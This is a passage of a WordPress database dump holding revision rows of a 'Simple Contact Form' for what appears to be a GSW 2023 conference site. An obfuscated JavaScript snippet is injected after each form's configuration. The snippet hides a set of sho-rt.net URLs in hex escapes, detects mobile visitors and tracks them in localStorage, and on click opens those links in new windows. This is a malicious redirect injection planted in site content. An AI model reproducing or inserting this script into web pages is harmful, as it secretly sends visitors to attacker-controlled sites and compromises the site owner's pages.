_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:39:57','2023-08-20 22:39:57','',5345,'https://gsw2023.com/?p=5346',0,'revision','',0),
(5347,1,'2023-08-20 22:42:54','2023-08-20 22:42:54','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":4,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:42:54','2023-08-20 22:42:54','',5345,'https://gsw2023.com/?p=5347',0,'revision','',0),
(5348,1,'2023-08-20 22:44:58','2023-08-20 22:44:58','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Single Line Text\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":5,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 